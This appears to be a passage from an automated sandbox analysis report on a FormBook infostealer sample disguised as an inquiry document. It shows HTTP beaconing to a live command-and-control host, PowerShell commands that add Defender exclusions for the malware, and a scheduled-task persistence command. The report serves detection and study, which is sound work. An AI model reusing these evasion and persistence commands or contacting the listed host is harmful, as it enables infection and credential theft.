                                                      Data Raw: 6c 76 2d 3d 31 35 58 42 77 68 56 79 44 2b 48 65 2f 76 49 4c 73 4c 67 77 77 5a 5a 31 4d 31 61 78 59 38 4e 75 71 63 7a 6c 5a 66 34 38 2b 2f 4b 46 35 76 59 55 62 79 70 64 6f 75 54 30 59 78 54 77 67 51 34 53 69 36 68 4e 45 79 65 55 49 54 37 59 79 65 63 43 47 4f 54 48 61 4b 48 6e 75 6f 75 62 30 53 6c 44 2f 48 48 6d 4b 47 6d 65 50 6a 64 45 68 33 72 42 57 67 51 6a 50 43 6c 49 41 33 66 6d 76 56 62 64 4d 64 69 35 37 67 6b 71 56 4a 42 63 69 37 31 4b 7a 65 37 41 31 44 77 47 73 7a 70 75 2f 6a 49 51 45 45 34 6d 78 59 57 47 4c 55 6c 32 4d 58 44 65 65 6a 2b 7a 47 41 75 78 4f 71 4c 49
                                                      Data Ascii: lv-=15XBwhVyD+He/vILsLgwwZZ1M1axY8NuqczlZf48+/KF5vYUbypdouT0YxTwgQ4Si6hNEyeUIT7YyecCGOTHaKHnuoub0SlD/HHmKGmePjdEh3rBWgQjPClIA3fmvVbdMdi57gkqVJBci71Kze7A1DwGszpu/jIQEE4mxYWGLUl2MXDeej+zGAuxOqLI
                                                      Jul 9, 2024 12:11:09.524163008 CEST691INHTTP/1.1 404 Not Found
                                                      Server: nginx
                                                      Date: Tue, 09 Jul 2024 10:11:09 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 548
                                                      Connection: close
                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      46192.168.2.94976138.145.202.186805488C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exe
                                                      TimestampBytes transferredDirectionData
                                                      Jul 9, 2024 12:11:11.535007954 CEST853OUTPOST /roex/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.5
                                                      Accept-Encoding: gzip, deflate
                                                      Host: www.9988566a4.shop
                                                      Content-Length: 216
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Cache-Control: max-age=0
                                                      Origin: http://www.9988566a4.shop
                                                      Referer: http://www.9988566a4.shop/roex/
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                      Data Raw: 6c 76 2d 3d 31 35 58 42 77 68 56 79 44 2b 48 65 74 2f 34 4c 74 73 4d 77 34 5a 5a 30 44 56 61 78 57 73 4e 71 71 63 2f 6c 5a 64 55 73 2b 4b 61 46 35 4f 6f 55 61 7a 70 64 39 75 54 30 58 52 54 73 39 41 35 51 69 36 6c 46 45 7a 69 55 49 53 66 59 79 66 73 43 46 39 72 49 62 61 48 68 33 59 75 64 2b 79 6c 44 2f 48 48 6d 4b 47 44 31 50 6a 56 45 68 6e 62 42 58 46 39 31 48 69 6c 4a 4a 58 66 6d 35 56 62 52 4d 64 6a 63 37 6c 45 41 56 4c 4a 63 69 2f 78 4b 79 4c 50 44 2b 44 78 50 68 54 6f 75 35 69 39 56 46 57 78 7a 73 72 62 6c 66 6e 6c 65 43 57 6a 41 50 52 33 6f 54 58 75 57 4a 4e 43 67 58 73 71 76 59 62 37 66 34 64 49 39 38 74 79 41 7a 57 72 58 58 67 3d 3d
                                                      Data Ascii: lv-=15XBwhVyD+Het/4LtsMw4ZZ0DVaxWsNqqc/lZdUs+KaF5OoUazpd9uT0XRTs9A5Qi6lFEziUISfYyfsCF9rIbaHh3Yud+ylD/HHmKGD1PjVEhnbBXF91HilJJXfm5VbRMdjc7lEAVLJci/xKyLPD+DxPhTou5i9VFWxzsrblfnleCWjAPR3oTXuWJNCgXsqvYb7f4dI98tyAzWrXXg==
                                                      Jul 9, 2024 12:11:12.099292040 CEST691INHTTP/1.1 404 Not Found
                                                      Server: nginx
                                                      Date: Tue, 09 Jul 2024 10:11:12 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 548
                                                      Connection: close
                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      47192.168.2.94976238.145.202.186805488C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exe
                                                      TimestampBytes transferredDirectionData
                                                      Jul 9, 2024 12:11:14.115359068 CEST1866OUTPOST /roex/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.5
                                                      Accept-Encoding: gzip, deflate
                                                      Host: www.9988566a4.shop
                                                      Content-Length: 1228
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Cache-Control: max-age=0
                                                      Origin: http://www.9988566a4.shop
                                                      Referer: http://www.9988566a4.shop/roex/
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                      Data Raw: 6c 76 2d 3d 31 35 58 42 77 68 56 79 44 2b 48 65 74 2f 34 4c 74 73 4d 77 34 5a 5a 30 44 56 61 78 57 73 4e 71 71 63 2f 6c 5a 64 55 73 2b 4a 36 46 2b 34 38 55 62 51 78 64 37 65 54 30 4a 68 54 38 39 41 34 49 69 36 64 37 45 7a 75 75 49 51 58 59 78 39 6b 43 4f 73 72 49 56 61 48 68 2f 34 75 63 30 53 6c 53 2f 48 58 36 4b 47 7a 31 50 6a 56 45 68 68 2f 42 51 51 52 31 4b 43 6c 49 41 33 66 69 76 56 61 34 4d 64 36 68 37 6c 41 36 53 36 70 63 68 62 56 4b 78 39 6a 44 69 54 78 4e 6d 54 6f 41 35 69 68 65 46 57 63 49 73 6f 47 41 66 6e 4e 65 43 51 4b 6b 65 6c 7a 6f 46 56 6d 30 50 4e 75 2f 62 72 71 56 41 36 48 57 6e 38 42 65 68 4f 76 51 35 79 6d 31 56 42 68 58 68 4c 2b 79 53 38 47 56 6d 2b 32 50 72 4f 78 66 57 5a 34 4c 78 6a 77 4c 44 68 75 4c 67 6b 53 4e 42 45 34 67 34 4f 6b 33 42 6c 6b 35 63 6a 63 61 64 64 62 39 6d 51 54 67 5a 56 34 76 55 4c 68 41 4d 44 6a 58 45 6b 68 38 38 33 63 71 47 52 30 78 61 71 44 57 4d 51 42 33 37 6f 37 66 65 4d 61 69 74 46 66 73 36 33 76 68 71 49 32 36 79 4b 68 63 6b 75 39 5a 79 66 6e 6d 61 59 [TRUNCATED]
                                                      Data Ascii: lv-=15XBwhVyD+Het/4LtsMw4ZZ0DVaxWsNqqc/lZdUs+J6F+48UbQxd7eT0JhT89A4Ii6d7EzuuIQXYx9kCOsrIVaHh/4uc0SlS/HX6KGz1PjVEhh/BQQR1KClIA3fivVa4Md6h7lA6S6pchbVKx9jDiTxNmToA5iheFWcIsoGAfnNeCQKkelzoFVm0PNu/brqVA6HWn8BehOvQ5ym1VBhXhL+yS8GVm+2PrOxfWZ4LxjwLDhuLgkSNBE4g4Ok3Blk5cjcaddb9mQTgZV4vULhAMDjXEkh883cqGR0xaqDWMQB37o7feMaitFfs63vhqI26yKhcku9ZyfnmaYenp6WnH46Xl27x1L7+NuFvQuqhOZ3BeLJxlMjC44zbOnXl9UU5rPaW2O4kV0Z/m5aHpRn5IY5s2znyw1mUnW/LFl2IqScbimMIW8RgaoNdq8/c/AYJaL3c3OYhKpiSRVZy5/KA0me8fkMksc0GDWZGtSlIXmSBuBeScbCdicn/dzx7xFJTgFFBBRODkaXjfJu43+Ri5wS++3lf7jLIhTiCFnNab2OrSkXHt3gIjYMl6v3IbmQm1TgQ7AwvaMRh5punXWExZZXhAeGoVhY0hlQvDrQyH+B4f4LWJhsN7GeFRoBQal39+76ZQJdto0OL+xiqAcMWCkY7WlA+rt1i0KucavOSRHNb6AjeYJKipemPapqDxKx5Fpa0kCuoCqExYRbyAkEcUkCphc6zjbuK5l5J7hIMh+5AjGAuqz8tFuUL78maytI08SUpR4LP30EZp4qJMIi63fcpiEi/O8O75AXRSaQMDuNNYxaWc/jIkP83IxUlY49uHgr8BT55ih11BugRTVcqH0rxkcF0PrrfelbWDUq5X+ojiHsiemVlF+eb/faHua3PAa0oWqO97lcUUC3jCgSRdwU47aIWjP1WVkyBFoR73On6GC6IhCWyfJuiVJRnBMOnWv+4n772NytYLH72tfvGtSjDAgorbYzIYE0oWTUqESpU8JUy [TRUNCATED]
                                                      Jul 9, 2024 12:11:14.693792105 CEST691INHTTP/1.1 404 Not Found
                                                      Server: nginx
                                                      Date: Tue, 09 Jul 2024 10:11:14 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 548
                                                      Connection: close
                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      48192.168.2.94976338.145.202.186805488C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exe
                                                      TimestampBytes transferredDirectionData
                                                      Jul 9, 2024 12:11:16.679042101 CEST566OUTGET /roex/?lv-=47/hzVl8DcmSvoQ5q5p0wIxjDl6sc/p2osL1e58noL7mmdwCeRUqiv3Sczuo1RIrkshpBASuVUC/h9VDFMrIc6PlwYO66SdA0FrSeVnyMCMUxRe8Kg==&GJtTF=-FH8yJw HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.5
                                                      Host: www.9988566a4.shop
                                                      Connection: close
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                      Jul 9, 2024 12:11:17.277434111 CEST691INHTTP/1.1 404 Not Found
                                                      Server: nginx
                                                      Date: Tue, 09 Jul 2024 10:11:17 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 548
                                                      Connection: close
                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                      Statistics

                                                      CPU Usage

                                                      Click to jump to process

                                                      Memory Usage

                                                      Click to jump to process

                                                      High Level Behavior Distribution

                                                      Click to dive into process behavior distribution

                                                      Behavior

                                                      Click to jump to process

                                                      System Behavior

                                                      General

                                                      Target ID:0
                                                      Start time:06:07:13
                                                      Start date:09/07/2024
                                                      Path:C:\Users\user\Desktop\Inquiry PR#27957.bat.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Users\user\Desktop\Inquiry PR#27957.bat.exe"
                                                      Imagebase:0xae0000
                                                      File size:879'624 bytes
                                                      MD5 hash:9972524538C9F43A23AD683DA0A1A97A
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:low
                                                      Has exited:true

                                                      General

                                                      Target ID:3
                                                      Start time:06:07:15
                                                      Start date:09/07/2024
                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Inquiry PR#27957.bat.exe"
                                                      Imagebase:0x30000
                                                      File size:433'152 bytes
                                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:4
                                                      Start time:06:07:15
                                                      Start date:09/07/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff70f010000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:5
                                                      Start time:06:07:16
                                                      Start date:09/07/2024
                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\fuqwoDzun.exe"
                                                      Imagebase:0x30000
                                                      File size:433'152 bytes
                                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:6
                                                      Start time:06:07:16
                                                      Start date:09/07/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff70f010000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:7
                                                      Start time:06:07:16
                                                      Start date:09/07/2024
                                                      Path:C:\Windows\SysWOW64\schtasks.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\fuqwoDzun" /XML "C:\Users\user\AppData\Local\Temp\tmp2C94.tmp"
                                                      Imagebase:0x1e0000
                                                      File size:187'904 bytes
                                                      MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:8
                                                      Start time:06:07:16
                                                      Start date:09/07/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff70f010000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:9
                                                      Start time:06:07:16
                                                      Start date:09/07/2024
                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                                      Imagebase:0xb90000
                                                      File size:45'984 bytes
                                                      MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.1645996592.00000000015A0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.1645996592.00000000015A0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.1645343377.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.1645343377.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.1647315768.0000000002340000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.1647315768.0000000002340000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:10
                                                      Start time:06:07:19
                                                      Start date:09/07/2024
                                                      Path:C:\Users\user\AppData\Roaming\fuqwoDzun.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Users\user\AppData\Roaming\fuqwoDzun.exe
                                                      Imagebase:0x200000
                                                      File size:879'624 bytes
                                                      MD5 hash:9972524538C9F43A23AD683DA0A1A97A
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Antivirus matches:
                                                      • Detection: 100%, Joe Sandbox ML
                                                      • Detection: 34%, ReversingLabs
                                                      Reputation:low
                                                      Has exited:true

                                                      General

                                                      Target ID:11
                                                      Start time:06:07:19
                                                      Start date:09/07/2024
                                                      Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                      Imagebase:0x7ff72d8c0000
                                                      File size:496'640 bytes
                                                      MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                      Has elevated privileges:true
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:12
                                                      Start time:06:07:21
                                                      Start date:09/07/2024
                                                      Path:C:\Windows\SysWOW64\schtasks.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\fuqwoDzun" /XML "C:\Users\user\AppData\Local\Temp\tmp40A9.tmp"
                                                      Imagebase:0x1e0000
                                                      File size:187'904 bytes
                                                      MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:13
                                                      Start time:06:07:21
                                                      Start date:09/07/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff70f010000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:14
                                                      Start time:06:07:21
                                                      Start date:09/07/2024
                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                                      Imagebase:0x680000
                                                      File size:45'984 bytes
                                                      MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000E.00000002.1858896914.0000000003320000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000E.00000002.1858896914.0000000003320000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:16
                                                      Start time:06:07:38
                                                      Start date:09/07/2024
                                                      Path:C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exe"
                                                      Imagebase:0x5c0000
                                                      File size:140'800 bytes
                                                      MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000010.00000002.3788150976.0000000003C10000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000010.00000002.3788150976.0000000003C10000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                      Reputation:high
                                                      Has exited:false

                                                      General

                                                      Target ID:17
                                                      Start time:06:07:40
                                                      Start date:09/07/2024
                                                      Path:C:\Windows\SysWOW64\sfc.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Windows\SysWOW64\sfc.exe"
                                                      Imagebase:0xe40000
                                                      File size:40'448 bytes
                                                      MD5 hash:4D2662964EF299131D049EC1278BE08B
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000011.00000002.3788281912.0000000002F50000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
